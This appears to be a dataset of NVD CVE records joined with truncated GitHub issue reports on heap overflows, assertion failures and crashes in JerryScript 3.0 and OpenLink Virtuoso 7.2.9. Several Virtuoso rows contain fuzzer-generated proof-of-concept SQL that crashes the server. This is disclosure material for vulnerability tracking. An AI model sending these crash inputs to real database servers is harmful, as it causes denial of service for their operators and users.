CVE-2023-31906 | 2023-05-10T15:15:10.187 | Jerryscript 3.0.0(commit 1a2c047) was discovered to contain a heap-buffer-overflow via the component lexer_compare_identifier_to_chars at /jerry-core/parser/js/js-lexer.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5066"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5066 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | heap-buffer-overflow in lexer_compare_identifier_to_chars | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5066/comments | 0 | 2023-04-08T12:50:49Z | 2023-04-08T12:50:49Z | https://github.com/jerryscript-project/jerryscript/issues/5066 | 1,659,514,220 | 5,066 |
CVE-2023-31907 | 2023-05-10T15:15:10.353 | Jerryscript 3.0.0 was discovered to contain a heap-buffer-overflow via the component scanner_literal_is_created at /jerry-core/parser/js/js-scanner-util.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5073"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5073 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --compile-flag=-m32 --compi... | heap-buffer-overflow in scanner_literal_is_created | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5073/comments | 0 | 2023-04-19T12:27:29Z | 2023-04-19T12:27:29Z | https://github.com/jerryscript-project/jerryscript/issues/5073 | 1,674,802,543 | 5,073 |
CVE-2023-31908 | 2023-05-10T15:15:10.533 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain a heap-buffer-overflow via the component ecma_builtin_typedarray_prototype_sort. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5067"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6DB8D818-8F21-4FD3-8D4D-A024A6346CB4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/jerryscript-project/jerryscript/issues/5067 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --c... | heap-buffer-overflow in ecma_builtin_typedarray_prototype_sort | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5067/comments | 0 | 2023-04-08T13:31:08Z | 2023-04-08T13:39:28Z | https://github.com/jerryscript-project/jerryscript/issues/5067 | 1,659,524,592 | 5,067 |
CVE-2023-31910 | 2023-05-10T15:15:10.697 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain a heap-buffer-overflow via the component parser_parse_function_statement at /jerry-core/parser/js/js-parser-statm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5076"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5076 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --c... | heap-buffer-overflow in parser_parse_function_statement | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5076/comments | 0 | 2023-04-23T16:01:47Z | 2023-04-23T16:01:47Z | https://github.com/jerryscript-project/jerryscript/issues/5076 | 1,680,076,342 | 5,076 |
CVE-2023-31913 | 2023-05-12T14:15:09.773 | Jerryscript 3.0 *commit 1a2c047) was discovered to contain an Assertion Failure via the component parser_parse_class at jerry-core/parser/js/js-parser-expr.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5061"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5061 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | Assertion 'context_p->scope_stack_size == PARSER_MAXIMUM_DEPTH_OF_SCOPE_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class):1068. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5061/comments | 0 | 2023-04-06T10:46:13Z | 2023-04-06T10:46:13Z | https://github.com/jerryscript-project/jerryscript/issues/5061 | 1,657,176,424 | 5,061 |
CVE-2023-31914 | 2023-05-12T14:15:09.807 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain out-of-memory issue in malloc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5071"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5071 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | AddressSanitizer: allocator is out of memory trying to allocate | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5071/comments | 0 | 2023-04-19T11:36:46Z | 2023-04-19T11:36:46Z | https://github.com/jerryscript-project/jerryscript/issues/5071 | 1,674,723,917 | 5,071 |
CVE-2023-31916 | 2023-05-12T14:15:09.847 | Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the jmem_heap_finalize at jerry-core/jmem/jmem-heap.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5062"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5062 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5062/comments | 0 | 2023-04-06T13:12:15Z | 2023-04-06T13:12:15Z | https://github.com/jerryscript-project/jerryscript/issues/5062 | 1,657,404,755 | 5,062 |
CVE-2023-31918 | 2023-05-12T14:15:09.890 | Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the parser_parse_function_arguments at jerry-core/parser/js/js-parser.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5064"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5064 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5064/comments | 0 | 2023-04-06T14:02:51Z | 2023-04-06T14:02:51Z | https://github.com/jerryscript-project/jerryscript/issues/5064 | 1,657,488,796 | 5,064 |
CVE-2023-31919 | 2023-05-12T14:15:09.927 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the jcontext_raise_exception at jerry-core/jcontext/jcontext.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5069"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5069 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi... | Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5069/comments | 0 | 2023-04-16T13:13:26Z | 2023-04-16T13:13:26Z | https://github.com/jerryscript-project/jerryscript/issues/5069 | 1,669,965,859 | 5,069 |
CVE-2023-31920 | 2023-05-12T14:15:09.963 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the vm_loop at jerry-core/vm/vm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5070"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5070 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi... | Assertion 'ecma_find_named_property (func_obj_p, ecma_get_magic_string (LIT_MAGIC_STRING_NAME)) == NULL' failed at /jerryscript/jerry-core/vm/vm.c(vm_loop):2173. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5070/comments | 0 | 2023-04-19T03:29:02Z | 2023-04-19T03:29:02Z | https://github.com/jerryscript-project/jerryscript/issues/5070 | 1,674,113,082 | 5,070 |
CVE-2023-31921 | 2023-05-12T14:15:10.007 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5068"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5068 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi... | Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5068/comments | 0 | 2023-04-08T14:19:33Z | 2023-04-08T14:19:33Z | https://github.com/jerryscript-project/jerryscript/issues/5068 | 1,659,537,585 | 5,068 |
CVE-2023-31607 | 2023-05-15T15:15:11.573 | An issue in the __libc_malloc component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1120"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1120 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x VARCHAR, k VARCHAR);
CREATE INDEX t1i1 ON t1(c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,c17,c18,c19,c20,c21,c22,c23,c24,c25,c26,c27,c28,c29,c30,c31,c32,c33,c34,c35,c36,c37,c38,c39,c40,c41,c42,c43,c44,c45,c46,c47,c48,c49,c50,c51,c52,c53,c54,... | virtuoso 7.2.9 crashed at __libc_malloc | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1120/comments | 0 | 2023-04-12T18:42:34Z | 2023-04-14T08:12:11Z | https://github.com/openlink/virtuoso-opensource/issues/1120 | 1,665,064,064 | 1,120 |
CVE-2023-31608 | 2023-05-15T15:15:11.623 | An issue in the artm_div_int component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1123"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1123 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT CAST('-9223372036854775808' AS INTEGER) / CAST('-1' AS SMALLINT);
```
backtrace:
```c
#0 0xc227a4 (artm_div_int+0xf4)
#1 0xc23766 (artm_vec+0x7d6)
#2 0x7518c2 (code_vec_run_v+0x10e2)
#3 0x7ac3ff (qn_input+0x38f)
#4 0x7ac8a6 (qn_send_output+0x236)
#5 0x81e... | virtuoso 7.2.9 crashed at artm_div_int | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1123/comments | 0 | 2023-04-12T18:49:08Z | 2023-04-14T08:12:12Z | https://github.com/openlink/virtuoso-opensource/issues/1123 | 1,665,072,694 | 1,123 |
CVE-2023-31609 | 2023-05-15T15:15:11.673 | An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1126"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1126 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE b (
folders VARCHAR(80),
folderid VARCHAR(80),
parentid VARCHAR(80),
rootid VARCHAR(80),
c INTEGER,
path VARCHAR(80),
id VARCHAR(80),
i VARCHAR(80),
d VARCHAR(80),
e VARCHAR(80),
f ... | virtuoso 7.2.9 crashed at dfe_unit_col_loci | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1126/comments | 1 | 2023-04-12T18:58:35Z | 2023-04-17T19:06:54Z | https://github.com/openlink/virtuoso-opensource/issues/1126 | 1,665,085,302 | 1,126 |
CVE-2023-31610 | 2023-05-15T15:15:11.720 | An issue in the _IO_default_xsputn component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1118"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1118 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t2(x VARCHAR, y VARCHAR, c VARCHAR);
CREATE VIEW t2 AS SELECT * FROM t2;
INSERT INTO t2 VALUES(8,8,RDF_SYS.xsd_hexBinary_fromBinary(SYSTEM_BASE64_ENCODE(zeroblob(200))));
```
backtrace:
```c
#0 0x7f87bcd56050 (_IO_default_xsputn+0xa0)
#1 0x7f87bcd3b0f... | virtuoso 7.2.9 crashed at _IO_default_xsputn | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1118/comments | 0 | 2023-04-12T18:33:19Z | 2023-04-14T08:12:10Z | https://github.com/openlink/virtuoso-opensource/issues/1118 | 1,665,051,847 | 1,118 |
CVE-2023-31611 | 2023-05-15T15:15:11.770 | An issue in the __libc_longjmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1119"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1119 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE hist (
cnt VARCHAR NOT NULL,
y VARCHAR NOT NULL,
z VARCHAR,
PRIMARY KEY (cnt,y)
);
CREATE TABLE t19d AS (SELECT * FROM hist UNION ALL SELECT 1234);
```
backtrace:
```c
#0 0x7f523bf87dbe (__libc_longjmp+0xde)
#1 0x5177d573a547bfaf -- no sym... | virtuoso 7.2.9 crashed at __libc_longjmp | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1119/comments | 0 | 2023-04-12T18:38:29Z | 2023-04-14T08:12:10Z | https://github.com/openlink/virtuoso-opensource/issues/1119 | 1,665,059,115 | 1,119 |
CVE-2023-31612 | 2023-05-15T15:15:11.813 | An issue in the dfe_qexp_list component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1125"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1125 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x VARCHAR,
y VARCHAR
);
SELECT IFNULL(MIN(x), -1), IFNULL(MAX(x), -1)
FROM (
SELECT x FROM t1 UNION ALL
SELECT NULL
) AS temp;
```
backtrace:
```c
#0 0x737010 (dfe_qexp_list+0x40)
#1 0x73711d (dfe_qexp_list+0x14d)
